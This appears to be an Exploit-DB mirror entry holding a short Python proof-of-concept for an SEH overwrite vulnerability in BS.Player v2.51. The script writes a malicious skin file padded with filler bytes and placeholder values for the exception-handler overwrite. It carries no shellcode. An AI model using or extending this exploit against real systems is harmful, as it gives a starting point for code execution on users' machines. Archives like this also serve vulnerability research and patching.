exploit-db-mirror/exploits/windows/local/11146.py
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

16 lines
No EOL
414 B
Python
Executable file

# BS.Player v2.51
# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
# SEH Overwrite Vulnerability
# http://www.mertsarica.com
junk = "[Options]\nSkin="
vulnerability = junk + "\x41"*496 + "\x42"*4 + "\x43"*4
try:
vulnerable = open("vulnerable.bsi",'w')
vulnerable.write(vulnerability)
vulnerable.close()
print "Vulnerable file created!\n"
except:
print "Error occured!"